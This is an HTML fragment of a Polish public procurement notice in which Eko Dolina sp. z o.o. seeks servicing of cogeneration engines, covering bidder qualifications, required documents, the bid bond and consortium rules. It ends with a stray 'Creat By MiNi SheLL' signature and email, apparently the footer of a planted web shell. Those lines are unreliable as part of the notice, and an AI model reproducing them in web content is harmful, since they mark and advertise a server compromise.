kogeneracyjnych Waukesha P48 GLD – system sterowania Kuhse;<br/>- dla zespołu kogeneracyjnego Jenbacher JMS 316 GLS – system sterowania zespołem DIA.NE XT4 HMI.<br/>3) sytuacji ekonomicznej lub finansowej:<br/> Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca posiada: <br/>a) środki finansowe w wysokości co najmniej 250.000,00 zł lub zdolność kredytową w wysokości co najmniej 250.000,00 zł;<br/><br/>Wartości i dane ekonomiczne i finansowe przedstawione przez Wykonawcę mają potwierdzić spełnianie przez Wykonawcę warunków określonych przez Zamawiającego powyżej w niniejszym punkcie. Jeżeli Wykonawca przedstawi wartości i dane ekonomiczne w innej walucie niż PLN, wówczas Zamawiający dokona przeliczenia według średniego kursu Narodowego Banku Polskiego (NBP) obowiązującego w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.<br/><br/>4) zdolności technicznej lub zawodowej:<br/>Warunek ten zostanie spełniony, jeżeli: <br/>a)	Wykonawca wykaże, że należycie wykonał lub wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy – w tym okresie, serwis okresowy co najmniej trzech zespołów kogeneracyjnych o mocy nie niższej niż 400 kW każdy. Wykonane prace serwisowe muszą być zrealizowane bądź realizowane tylko zalecanych przez producenta części zamiennych niezbędnych do wykonania prac;<br/>Aby uznać warunek za spełniony, Wykonawca może wykazać serwisowanie trzech lub więcej wyżej opisanych zespołów kogeneracyjnych w ramach realizacji jednej umowy lub w ramach realizacji kilku umów. <br/>Zdolność techniczna lub zawodowa dla podmiotów występujących wspólnie będzie oceniana łącznie dla wszystkich podmiotów.<br/>b)	Wykonawca wykaże iż dysponuje osobami zdolnymi do wykonania zamówienia tzw. osobami Personelu Kluczowego tj.:<br/> - Wykaże osoby/osobę skierowane przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialne za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami: wykazane osoby/osoba muszą legitymować się imiennymi certyfikatami uprawniającymi do obsługi i remontów ścieżki gazowej silników (Gas Engine Technology) oraz certyfikatami uprawniającymi do serwisowania i remontów silników VGF (VGF Technology) wystawionymi przez producenta zespołów kogeneracyjnych. <br/>Posiadane przez Członków Personelu Kluczowego: uprawnienia w wymaganym zakresie, powinny być zgodne z Rozporządzeniem Ministra Klimatu i Środowiska z dnia 1 lipca 2022 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci.<br/>Wszystkie osoby będące obywatelami krajów członkowskich Unii Europejskiej, które Wykonawca wskaże do uczestniczenia w wykonaniu niniejszego zamówienia i od których wymagane świadectwa kwalifikacyjne SEP typu „E” i „D”, muszą posiadać decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczypospolitej Polskiej funkcji w zakresie przedmiotu niniejszego zamówienia zgodnie z Ustawą z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tj. Dz. U. 2023 poz.334).<br/>Ponadto, osoby/osoba wykonujące przedmiot zamówienia musi/muszą posiadać świadectwa kwalifikacyjne lub równoważne, określone w Rozporządzeniu Ministra Klimatu i Środowiska z dnia 1 lipca 2022r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz.U. 2022 poz. 1392) oraz w Ustawie Prawo Energetyczne z 10 kwietnia 1997r. . (t. j. Dz. U. 2022 poz. 1385), w szczególności wszystkie osoby dedykowane do realizacji zadania muszą posiadać uprawnienia kwalifikacyjne SEP „E” lub równoważne dla grup:<br/>-	G1 urządzenia elektryczne o napięciu do 1kV oraz obsługa generatorów prądotwórczych o mocy elektrycznej minimum 800 kW, <br/>	- G2 urządzenia ciepłownicze o mocy powyżej 50 kW, <br/>	- G3 urządzenia gazowe o ciśnieniu roboczym powyżej 5 kPa<br/>	oraz uprawnienia dozorowe „D” lub równoważne dla grup G1, G2, G3 odpowiednio jak dla „E” dla osoby kierującej pracownikami i robotami.<br/><br/>UWAGA! Zamawiający dopuszcza sytuację, kiedy jedna z wykazanych osób posiada ukończone szkolenia (Gas Engine Technology) oraz (VGF Technology), a także uprawnienia „D” dla grup G1, G2 i G3. Natomiast bezwzględnie każda z osób musi posiadać wymagane uprawnienia kwalifikacyjne SEP „E” G1, G2 i G3, <br/><br/>c)	Wykaże dysponowanie narzędziami, wyposażeniem zakładu i urządzeniami technicznymi dostępnymi wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami; wykaz narzędzi musi zawierać przynajmniej:<br/>•	zestaw specjalistycznych narzędzi do wykonywania serwisu silników zasilanych paliwami gazowymi (do demontażu tulei cylindrowych, tłoków, pierścieni, łożysk, głowic cylindrowych)<br/>•	zestaw narzędzi do wykonywania napraw i bieżącej obsługi serwisowej (analizator spalin, miernik kompresji, stroboskop, boroskop, pirometr) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z postępowania – zgodnie z Zał. nr 2 do SWZ.<br/>2.	Informacje zawarte w oświadczeniu, o którym mowa w ust. 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3.	Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>a)	Wykazu wykonanych usług wraz z dowodami określających, czy usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie 3 miesięcy; (jeden wspólny wykaz w przypadku Wykonawców składających ofertę wspólną); – zgodnie z zał. nr 3 do SWZ;<br/>b)	Wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z zał. nr 3A do SWZ;<br/>c)	wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami – zgodnie z zał. nr 3B do SWZ;<br/>d)	Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>e)	licencji do dokonywania zmian w systemie sterowania zespołów kogeneracyjnych:<br/>- dla zespołów kogeneracyjnych Waukesha P48 GLD – system sterowania Kuhse;<br/>- dla zespołu kogeneracyjnego Jenbacher JMS 316 GLS – system sterowania zespołem DIA.NE XT4 HMI.<br/>4.	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>1)	może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP dane umożliwiające dostęp do tych środków;<br/>2)	podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w art. 125 ust. 1.<br/>5.	Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>6.	W zakresie nieuregulowanym ustawą PZP lub niniejszą SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy, i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z postępowania – zgodnie z Zał. nr 2 do SWZ.<br/>2.	Informacje zawarte w oświadczeniu, o którym mowa w ust. 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3.	Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>a)	Wykazu wykonanych usług wraz z dowodami określających, czy usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie 3 miesięcy; (jeden wspólny wykaz w przypadku Wykonawców składających ofertę wspólną); – zgodnie z zał. nr 3 do SWZ;<br/>b)	Wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z zał. nr 3A do SWZ;<br/>c)	wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami – zgodnie z zał. nr 3B do SWZ;<br/>d)	Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>e)	licencji do dokonywania zmian w systemie sterowania zespołów kogeneracyjnych:<br/>- dla zespołów kogeneracyjnych Waukesha P48 GLD – system sterowania Kuhse;<br/>- dla zespołu kogeneracyjnego Jenbacher JMS 316 GLS – system sterowania zespołem DIA.NE XT4 HMI.<br/>4.	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>1)	może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP dane umożliwiające dostęp do tych środków;<br/>2)	podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w art. 125 ust. 1.<br/>5.	Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>6.	W zakresie nieuregulowanym ustawą PZP lub niniejszą SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy, i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Ustala się wadium w wysokości: 3 000,00 zł, słownie: trzy tysiące 00/100 złotych, <br/>Wadium: - wpłaca się przelewem na rachunek bankowy Zamawiającego wskazany poniżej:<br/>Bank Pekao S.A. III O/ w Gdyni ul. Hutnicza 3a, 81-212 Gdynia nr 28124035231111000043351129<br/>1.	Wadium wnosi się przed upływem terminu składania ofert.<br/>2.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu; <br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. 2020.299).<br/>3.	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Pekao S.A. III O/ w Gdyni ul. Hutnicza 3a, 81-212 Gdynia nr rachunku 28124035231111000043351129 z dopiskiem „Wadium – nr postępowania”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>4.	Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie PZP, <br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: „Eko Dolina” sp. z o. o.<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 PZP), Zamawiający wymaga, aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>5.	Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP. zostanie odrzucona na podstawie art. 226 ust. 1 pkt 14 ustawy PZP.<br/>6.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 PZP. Zasady te zostały dookreślone w ust. 8. <br/>7.	Wniesienie wadium w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 uPzp nie może powodować kosztów po stronie Zamawiającego. Jeżeli wadium będzie powodowało koszty po stronie Zamawiającego, to Zamawiający zwolni wadium pomniejszone o te koszty. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy, którzy będą wspólnie składać ofertę, dodatkowo muszą ustanowić i wskazać Pełnomocnika, który będzie miał<br/>umocowanie do reprezentowania ich w niniejszym postępowaniu albo do reprezentowania w postępowaniu i zawarcia<br/>Umowy. Umocowanie musi wynikać z treści pełnomocnictwa przedłożonego wraz z Ofertą. Zaleca się, aby Pełnomocnikiem<br/>był jeden z Wykonawców wspólnie składających Ofertę.<br/>Pełnomocnictwo ustanawiające Pełnomocnika powinno:<br/>(a) jednoznacznie określać postępowanie, do którego się odnosi;<br/>(b) wymieniać wszystkich Wykonawców, którzy wspólnie ubiegają się o zamówienie;<br/>(c) precyzować zakres umocowania;<br/>(d) upoważniać Pełnomocnika do podejmowania niezbędnych działań związanych z postępowaniem i/lub dokonywania<br/>wszelkich czynności prawnych i faktycznych związanych z wykonaniem Umowy w imieniu Wykonawców;<br/>(e) być podpisane przez prawnie pełnomocnych przedstawicieli poszczególnych Wykonawców składających wspólną Ofertę,<br/>jako potwierdzenie uprawnień przekazanych Pełnomocnikowi;<br/>Oferta powinna być podpisana kwalifikowanym podpisem elektronicznym w sposób wiążący prawnie wszystkich Wykonawców.<br/>Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem Konsorcjum jeżeli załączone pełnomocnictwo nie<br/>będzie wskazywało inaczej. Wszelka korespondencja między Zamawiającym a Wykonawcami wspólnie ubiegającymi się o<br/>udzielenie zamówienia będzie kierowana do ustanowionego pełnomocnika ze skutkiem dla mocodawców. Wykonawcy<br/>występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (Konsorcjum), których oferta zostanie uznana za<br/>najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani przedstawić Zamawiającemu umowę<br/>regulującą współpracę tych wykonawców. Proponuje się (w celu ułatwienia przygotowania takiej umowy), aby w umowie<br/>zawrzeć m.in. następujące postanowienia:<br/>1) wyszczególnienie Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego,<br/>2) określenie celu gospodarczego, dla którego umowa została zawarta (celem tym musi być także zrealizowanie<br/>zamówienia),<br/>3) oznaczenie czasu trwania Konsorcjum obejmującego okres realizacji przedmiotu zamówienia, w tym okresu<br/>obowiązywania rękojmi i gwarancji,<br/>4) podział zadań pomiędzy poszczególnych Wykonawców należących do Konsorcjum,<br/>5) określenie lidera Konsorcjum (może nim być Pełnomocnik wskazany w ofercie Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia),<br/>6) wykluczenie możliwości wypowiedzenia umowy Konsorcjum przez któregokolwiek z jego członków do czasu wykonania<br/>zamówienia, odpowiedzialność za realizację zamówienia, za niewykonanie lub nienależyte wykonanie zamówienia oraz za<br/>wniesienie zabezpieczenia należytego wykonania umowy,<br/>7) zapis mówiący, że Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy,<br/>8) jeżeli jest to potrzebne, ustanowienie Pełnomocnika do zawarcia umowy w sprawie zamówienia publicznego.<br/>Nie dopuszcza się składania umowy przedwstępnej Konsorcjum lub umowy zawartej pod warunkiem zawieszającym.<br/>Wszelkie pełnomocnictwa muszą być złożone w formie oryginału opatrzonego kwalifikowanym podpisem elektronicznym lub<br/>notarialnie poświadczonej kopii.<br/>Oferta powinna być podpisana w sposób wiążący prawnie wszystkich Wykonawców.<br/>Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem. Wszelka korespondencja między<br/>Zamawiającym a Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia będzie kierowana do ustanowionego<br/>Pełnomocnika ze skutkiem dla mocodawców. Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za<br/>niewykonanie lub nienależyte wykonanie zobowiązań. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany umowy odbywać się będą zgodnie z zapisem art. 455 uPzp z dnia 11.09.2019r. i wymagają dla swojej<br/>ważności zachowania formy pisemnej. Zamawiający dopuszcza możliwość zmian istotnych, w rozumieniu art. 455 ust. 1 pkt<br/>1) uPzp, postanowień zawartej um. w stosunku do treści oferty w zakresie przewidzianym w paragrafie 21 ust. 4 odpowiednio w załączniku nr 10. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-13 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi załącznikami należy umieścić na Platformie pod adresem: https://platformazakupowa.pl/pn/ekodolina</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-13 14:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-07-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania zamówienia zgodnie z zapisami rozdz. XI SWZ.<br/>Zabezpieczenie ustala się w wysokości 5% ceny całkowitej (cena brutto) podanej w ofercie.<br/>Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania<br/>umowy. Zabezpieczenie wnosi się przed zawarciem umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com